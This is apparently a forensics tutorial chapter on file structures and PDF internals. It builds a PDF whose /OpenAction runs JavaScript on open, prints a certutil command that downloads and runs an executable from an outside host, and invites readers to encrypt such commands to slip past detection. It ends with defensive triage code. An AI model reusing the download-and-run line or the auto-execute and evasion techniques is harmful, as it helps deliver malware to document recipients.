Forensic Investigation - PDF File. 0x03
In the previous Forensics chapters we learnt:
In this chapter we will learn:
Let's rock!
If you know how hackers create and deploy malware in PDF files, you can easily reverse engineer the process. This is called PDF file forensics.
Before starting anything, let's first understand what “files” are.
Files are data structures which “write” data to disk or RAM according to a predefined structure, and the data can be “read” back only in the same way; you cannot bypass the structure. Nowadays these data structures can be quite complex. Earlier a file was just simple text, e.g. .txt, .c, .conf.
Why are these files complex?
If a file carries a graphical user interface, images, video, audio, layers, pictures, fonts, text, and so on, it becomes a really complex data structure. In short, the more data is captured, the greater the complexity of the file structure. This is because everything in the file must be presented to the user exactly as it was saved: the file reader or editor must reproduce it on a “what you save is what you get” basis.
Some file formats allow scripts for automation. This lets client applications integrate the file format into their own custom application through API integration. Compared to simple file structures, script-enabled file structures are really complex.
Welcome to the world of complexity.
The more complex the structure, the more likely developers are to make mistakes, which is good for hackers.
If you create a proprietary file structure, you need to make your own viewer, editor and reader. For example, since Adobe created its own proprietary file structure called “.PDF”, it has to develop applications such as “Adobe Viewer” to view .pdf files, “Adobe DC-Editor” to edit them, and an “Adobe API” which gives third-party applications read and write access to PDF files. This is only done if you want your files to be used by the “world”.
Otherwise you can make your own file structure which only your custom application can open. SAP files, for example, open only if you have SAP installed.
I love hackers; they find some way or other to get access to files and hack them.
Let's understand this: the image below shows a .JPG file opened in the Notepad editor. All you see is gibberish, yet if you open the same file in a browser or a “JPG viewer” you can see the beautiful image. That means a JPG file can be opened only if you know its structure.
Let's start by creating our own file structure. We will call it “.qrc”, meaning a “QRC” proprietary file which opens only in the QRC application, reader or editor that we develop.
Let's get our hands dirty.
We need to make two applications, or command-line programs. As this is a demo, we will not go through the long process of writing a GUI application; we will stick to the command line.
The first app is “qrc_writer.exe”, which we treat as the equivalent of the “DC-Adobe Editor”. It creates our own file, “proprietary.qrc”, in our own structure: just as the DC-Adobe Editor creates a “.pdf”, we create a “.qrc”, minus the GUI.
The second app is “qrc_reader.exe”, the equivalent of “Adobe Reader”. Our code reads the data the user saved in our proprietary format.
NOTE: The code for qrc_writer.c and qrc_reader.c is only for understanding file structures; the actual “.pdf” format and its applications are really complex.
Following is the code for “qrc_writer.c”, which creates our “.qrc” files:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The layout of one .qrc record. This struct is the "rule book": the reader
 * must use exactly the same definition to get the data back. */
typedef struct {
    char FileName[50];
    struct {
        char Date[20];
        char EditedBy[50];
        char ModifiedBy[50];
        char Owner[50];
    } Metadata;
    struct {
        char Heading1[100];
        char Heading2[100];
        char Comments[200];
    } Headings;
    char Text[500];
} FileData;

/* Append one record as raw bytes; "ab" keeps earlier records in the file. */
void writeFile(FileData data, const char *filename) {
    FILE *file = fopen(filename, "ab");
    if (!file) {
        perror("Unable to open file");
        exit(1);
    }
    fwrite(&data, sizeof(FileData), 1, file);
    fclose(file);
}

/* Prompt for every field. Each width (49, 19, 99, ...) is one less than the
 * field size, so long input is cut off instead of overflowing into the next field. */
void inputFileData(FileData *data) {
    memset(data, 0, sizeof *data);  /* otherwise stale stack bytes end up in the file */
    printf("Enter your Name: ");
    scanf(" %49[^\n]%*c", data->FileName);
    printf("Enter Date (YYYY-MM-DD): ");
    scanf(" %19[^\n]%*c", data->Metadata.Date);
    printf("Enter passwd : ");
    scanf(" %49[^\n]%*c", data->Metadata.EditedBy);
    printf("Enter ModifiedBy: ");
    scanf(" %49[^\n]%*c", data->Metadata.ModifiedBy);
    printf("Enter Owner: ");
    scanf(" %49[^\n]%*c", data->Metadata.Owner);
    printf("Enter Heading1: ");
    scanf(" %99[^\n]%*c", data->Headings.Heading1);
    printf("Enter Heading2: ");
    scanf(" %99[^\n]%*c", data->Headings.Heading2);
    printf("Enter Comments: ");
    scanf(" %199[^\n]%*c", data->Headings.Comments);
    printf("Enter Text: ");
    scanf(" %499[^\n]%*c", data->Text);
}

int main() {
    FileData data;
    char choice;
    do {
        inputFileData(&data);
        writeFile(data, "proprietary.qrc");
        printf("File written successfully.\n");
        printf("Do you want to enter another record? (y/n): ");
        scanf(" %c", &choice);
    } while (choice == 'y' || choice == 'Y');
    return 0;
}
The above code creates a file called “proprietary.qrc” which can only be read with our own reader, “qrc_reader.exe”.
To compile “qrc_writer.c”:
D:\> cl qrc_writer.c
Below is the code for “qrc_reader.c”, which reads only “proprietary.qrc” files:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Must match the struct in qrc_writer.c byte for byte, or every record
 * comes back as gibberish. */
typedef struct {
    char FileName[50];
    struct {
        char Date[20];
        char EditedBy[50];
        char ModifiedBy[50];
        char Owner[50];
    } Metadata;
    struct {
        char Heading1[100];
        char Heading2[100];
        char Comments[200];
    } Headings;
    char Text[500];
} FileData;

/* A record read from disk is untrusted: if a field is not NUL-terminated,
 * printf("%s") would read past it. Force a terminator on every field. */
static void terminateFields(FileData *d) {
    d->FileName[sizeof d->FileName - 1] = '\0';
    d->Metadata.Date[sizeof d->Metadata.Date - 1] = '\0';
    d->Metadata.EditedBy[sizeof d->Metadata.EditedBy - 1] = '\0';
    d->Metadata.ModifiedBy[sizeof d->Metadata.ModifiedBy - 1] = '\0';
    d->Metadata.Owner[sizeof d->Metadata.Owner - 1] = '\0';
    d->Headings.Heading1[sizeof d->Headings.Heading1 - 1] = '\0';
    d->Headings.Heading2[sizeof d->Headings.Heading2 - 1] = '\0';
    d->Headings.Comments[sizeof d->Headings.Comments - 1] = '\0';
    d->Text[sizeof d->Text - 1] = '\0';
}

/* Read the file one record at a time; fread returns 0 at end of file. */
void readFile(const char *filename) {
    FILE *file = fopen(filename, "rb");
    if (!file) {
        perror("Unable to open file");
        exit(1);
    }
    FileData data;
    while (fread(&data, sizeof(FileData), 1, file)) {
        terminateFields(&data);
        printf("Name: %s\n", data.FileName);
        printf("Date: %s\n", data.Metadata.Date);
        printf("passwd: %s\n", data.Metadata.EditedBy);
        printf("ModifiedBy: %s\n", data.Metadata.ModifiedBy);
        printf("Owner: %s\n", data.Metadata.Owner);
        printf("Heading1: %s\n", data.Headings.Heading1);
        printf("Heading2: %s\n", data.Headings.Heading2);
        printf("Comments: %s\n", data.Headings.Comments);
        printf("Text: %s\n", data.Text);
        printf("---------------------------------\n");
    }
    fclose(file);
}

int main() {
    readFile("proprietary.qrc");
    return 0;
}
You can compile it with:
D:\vmShare\Guru> cl qrc_reader.c
You can see qrc_writer.exe and qrc_reader.exe in action in the image below.
What is important to note in the above code is the file structure. The data is saved in the file “proprietary.qrc” exactly as the defined structure lays it out.
Structures are very important: the structure is the rule book for writing the file and for retrieving the saved data in the same structured way. If you cannot retrieve the data according to the structure, you do not get the right data, only the gibberish letters we saw in the first image.
In the same way, Adobe PDF has its own proprietary structure, which they have not shared with anyone. However, hackers have their own ways of finding things out: by reverse engineering PDF files, they have found vulnerabilities.
But why PDF files and not other files?
PDF is the world's favourite file and the most popular business document format to date; just imagine the flow of PDFs on the internet. If someone finds vulnerabilities in this document format, how much danger can it cause? Human trust in PDF files has also slowly developed.
Anyway, let's exploit and then do a forensic investigation on a PDF file.
Whatever file structure the hacker community has reverse engineered, cybercriminals can use it to attack remote users.
Let's understand the basic structure of a PDF file.
A very simple PDF file structure:
test.pdf
%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842] /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 51 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello, world!) Tj
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000010 00000 n
0000000059 00000 n
0000000114 00000 n
0000000217 00000 n
trailer
<< /Size 5 /Root 1 0 R >>
startxref
312
%%EOF
If you just copy and paste the above text into Notepad and save it with double quotes, like this: “test.pdf”, with “Save as type” set to “All files (*.*)”, this test.pdf will open in a browser as a PDF file without any error. Try it.
However, if you try to open this file in Adobe Reader, you will get a cross-reference error, because the cross-reference table offsets have not been calculated here.
The image below shows how we can simply copy the above text into a “test.pdf” file in Notepad and create a PDF file with the basic PDF structure.
Note: please save the file as “test.pdf”, with the double quotes, or else Notepad will append “.txt” to the name you provide. For example, if you just type test.pdf and press Save, the file will be named “test.pdf.txt”. So it is important to save the file name in quotes and to set “Save as type” to “All files (*.*)”.
Once the file is saved from Notepad as “test.pdf”, we can open our "test.pdf" in any web browser; the browser opens it gracefully, without any error.
The image below shows the “test.pdf” file opened successfully in the web browser.
It's amazing, right? We have not created the file with the Adobe PDF editor; we just copied the above text into Notepad and it magically became a PDF file. Why?
This is because we now know the basic structure of a PDF, and we have written that basic structure through Notepad, as PDF requires. Once our test.pdf is opened in the browser, the browser reads the structure, decides it is a PDF and renders it as a PDF through its Adobe PDF reader API.
Great. Let's understand the structure we have created.
%PDF-1.4
This is called “the header”; it is the first part of the PDF file and specifies the PDF version. It is also called the magic word: it is the signature of the PDF file, and every file format has its own signature. Any application will read these bytes and assume it is a PDF file; once assumed, it will take the PDF structure and start reading it.
This is the body part:
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842] /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 51 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello, world!) Tj
ET
endstream
endobj
The body contains the actual content of the document, which includes various objects such as text, images, fonts, annotations, and more. These objects are defined in a tree-like structure called the “document catalog”.
Each object in the body is identified by an object number and a generation number. Objects are defined like this:
1 0 obj
<< /Type /Catalog
/Pages 2 0 R
>>
endobj
This is the cross-reference table:
xref
0 4
0000000000 65535 f
0000000010 00000 n
0000000093 00000 n
0000000175 00000 n
The cross-reference table (xref table) provides byte offsets of all the objects within the file, so that they can be quickly located. It starts with the keyword xref and is followed by the object numbers and their corresponding byte offsets.
This is the trailer
trailer
<<
/Size 22
/Root 1 0 R
/Info 5 0 R
>>
startxref
655
%%EOF
The trailer contains information about the structure of the document. It points to the start of the cross-reference table and contains the root object, which is the document catalog. It also includes the size of the cross-reference table and an optional ID for the document.
With just the header, body, cross-reference table and trailer, the basic PDF structure is ready.
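As an added example (not the article's own code), here is the same “Hello, world!” PDF built in Python with the xref offsets, /Size, /Length and startxref computed from the bytes actually written, which is exactly what the hand-typed test.pdf lacks; the helper names are my own.

```python
# Added example (not the article's code): the article's "Hello, world!" PDF
# rebuilt with xref offsets, /Size and startxref computed from the real bytes.

def build_pdf(objects: list[bytes], root: int = 1) -> bytes:
    """Serialize objects 1..N (in order) followed by a correct xref table."""
    out = bytearray(b"%PDF-1.4\n")             # header / magic word
    offsets = []                                # where each "N 0 obj" starts
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)                         # the value startxref must hold
    out += b"xref\n0 %d\n" % (len(objects) + 1)
    out += b"0000000000 65535 f \n"             # entry 0: head of the free list
    for off in offsets:                         # 20-byte entries: offset, gen, 'n'
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root %d 0 R >>\n" % (len(objects) + 1, root)
    out += b"startxref\n%d\n%%%%EOF\n" % xref_pos
    return bytes(out)

def content_stream(ops: bytes) -> bytes:
    """Wrap page operators in a stream object whose /Length matches exactly."""
    return b"<< /Length %d >>\nstream\n" % len(ops) + ops + b"\nendstream"

# Constructed input: the four objects from the article's test.pdf.
HELLO_PDF = build_pdf([
    b"<< /Type /Catalog /Pages 2 0 R >>",
    b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
    b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842] /Contents 4 0 R >>",
    content_stream(b"BT\n/F1 24 Tf\n100 700 Td\n(Hello, world!) Tj\nET"),
])

def startxref_of(pdf: bytes) -> int:
    """The number after startxref: where the xref table is claimed to begin."""
    return int(pdf[pdf.rfind(b"startxref"):].split()[1])

def xref_offsets(pdf: bytes) -> list[int]:
    """Offsets of the in-use ('n') xref entries, in object order."""
    lines = pdf[startxref_of(pdf):].split(b"\n")
    count = int(lines[1].split()[1])            # "0 N" subsection header
    return [int(l.split()[0]) for l in lines[3:2 + count]]

def xref_is_consistent(pdf: bytes) -> bool:
    """The check a strict reader applies: startxref lands on 'xref' and every
    entry points at the matching 'N 0 obj'. The hand-typed test.pdf fails it."""
    if not pdf[startxref_of(pdf):].startswith(b"xref"):
        return False
    return all(pdf[off:].startswith(b"%d 0 obj" % (n + 1))
               for n, off in enumerate(xref_offsets(pdf)))
```

Writing HELLO_PDF to disk gives a file that opens without the cross-reference error; inserting a single extra byte anywhere in the body makes xref_is_consistent() return False, which is why the offsets cannot be typed by hand.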
Once you understand where to place JavaScript that executes when the document opens, you may write more complex JavaScript which downloads malware and executes it, for testing.
For this demo I am just executing the JavaScript alert() function, which says “Welcome to the world of malware.”
You can be really creative: you can add an OS-specific command which gets executed. For Linux you can run .sh files or ELF files; for Windows you can execute scripts which get downloaded and executed when the user opens the document, installing a trojan or whatever malware.
If you want to execute the script per OS, this JavaScript is a good starting point. It checks the OS and executes the script for that OS.
JavaScript that executes according to the OS flavour:
// Pick a code path by operating-system family.
// Note: navigator.platform is a browser API, so this snippet runs inside a
// web page's JavaScript engine, not inside a PDF viewer's own engine.
function allWindowsFunction() {
    console.log("Windows malware needs to be called.");
    // Add your Windows-specific code here
}

function unixFunction() {
    console.log("Unix malware needs to be called.");
    // Add your Unix-specific code here
}

function detectOS() {
    let platform = navigator.platform.toLowerCase();
    if (platform.indexOf('win') !== -1) {
        allWindowsFunction();
    } else if (platform.indexOf('mac') !== -1 || platform.indexOf('linux') !== -1 || platform.indexOf('unix') !== -1) {
        unixFunction();
    } else {
        console.log("Unknown OS.");
    }
}

detectOS();
Just for information, and for writing a Snort rule: one of the commands well known in the malware world is listed below.
a=eval("certutil -urlcache -split -f https://www.aquasan.co.in/calc.exe & calc.exe");
This script will download calc.exe from a web site and execute it. It takes a little time to download.
The image below shows it in action.
If you put the script directly into the malicious PDF we are going to create, it will not run. In the previous chapter, on packet sniffing of the network, we learned that if the keyword “.exe” is found, the respective security application will drop the packet.
All well-known browsers run in sandboxes, so they can block an “.exe” file.
Then how to execute it?
The best way is to encrypt the complete command in some way and then execute it; for example, create JavaScript that decrypts the command and then executes it. This logic can be integrated into the malicious PDF.
Try it. Once you have done this successfully, please ping me on LinkedIn. The best script will get a surprise from me; believe me, you will love it. It should execute in the latest Chrome browser.
Let's add JavaScript which executes when the user opens the PDF file: we will display an alert message when the document is opened.
OK, let's modify the PDF structure in Notepad so that it executes the JavaScript and shows an alert message.
Open Notepad, paste the following, and save it as “Demo02.pdf”.
%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript /JS
(app.alert('Welcome to the world of malware.');) >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842] /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 51 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello, world!) Tj
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000010 00000 n
0000000059 00000 n
0000000114 00000 n
0000000217 00000 n
trailer
<< /Size 5 /Root 1 0 R >>
startxref
312
%%EOF
You can see from the above snippet that we have just added this:
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript /JS
(app.alert('Welcome to the world of malware.');) >> >>
endobj
The app.alert('Welcome to the world of malware.'); is the JavaScript that executes when the document is opened. The only thing to remember is that we have to use “/OpenAction << /S /JavaScript /JS”, which triggers the execution of the JavaScript.
The image below demonstrates the execution of our JavaScript in demo02.pdf when a user opens it.
Now you know one of the many ways cybercriminals modify PDF files and send them to victims.
Now, whenever you receive a PDF file and you are not comfortable opening it, don't hesitate to open it in your favourite text editor. Before doing this, please make a copy and save it in another location; sometimes the editor may corrupt the original and you will be left without it.
Once you have made a copy, open it in any text editor and search for the keyword “/OpenAction << /S /JavaScript /JS” to see whether it contains any JavaScript. If it does, please, please, please don't open it in a PDF reader. Escalate it to your administrator.
There are many tools on the internet for looking inside PDF files; search for one for your further analysis.
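As an added example (not the article's own code, and no substitute for a full PDF parser), this Python triage does the manual search above on a copy of the file: it checks the %PDF- magic word, counts /OpenAction, /JavaScript and /JS after resolving the #xx escapes the PDF syntax permits in names (a plain text search misses those), and extracts an inline /JS string. The sample fragments are constructed here from the article's Demo02 catalog object; the function names are my own.

```python
# Added example (not the article's code): a first-pass triage of a PDF copy,
# i.e. the manual search for /OpenAction ... /JavaScript /JS done in code.
import re

RISKY_NAMES = (b"/OpenAction", b"/JavaScript", b"/JS")

def normalize_names(data: bytes) -> bytes:
    """PDF names may spell any byte as #xx ('/J#53' is '/JS'); resolve them
    so a keyword match is not defeated by the escape."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def triage_pdf(data: bytes) -> dict:
    """Report header validity, risky keyword counts and any inline JS source."""
    norm = normalize_names(data)
    report = {
        "valid_header": data.startswith(b"%PDF-"),       # the magic word
        "counts": {n.decode(): norm.count(n) for n in RISKY_NAMES},
    }
    # Inline JavaScript travels as a literal string: /JS (...) inside the dict.
    m = re.search(rb"/JS\s*\((.*?)\)\s*>>", norm, re.S)
    report["inline_js"] = m.group(1).decode("latin-1") if m else None
    report["suspicious"] = any(report["counts"].values())
    return report

# Constructed samples: a catalog with no actions, the article's Demo02
# catalog with its /OpenAction, and the same with two names written as #xx escapes.
BENIGN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
DEMO02 = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction "
          b"<< /S /JavaScript /JS\n(app.alert('Welcome to the world of malware.');) >> >>\n"
          b"endobj\n")
ESCAPED = DEMO02.replace(b"/JS", b"/J#53").replace(b"/OpenAction", b"/Open#41ction")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("demo02", DEMO02), ("escaped", ESCAPED)):
        print(name, triage_pdf(sample))
```

Run it against a copy of a real file with triage_pdf(open(path, "rb").read()); a non-zero count is a reason to escalate, not proof of malice, since legitimate forms also carry JavaScript.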
That's it for now.
In the next chapter we will be looking into Microsoft Word and Excel files for any malware integration.
Thanks a lot for reading.
See you next week.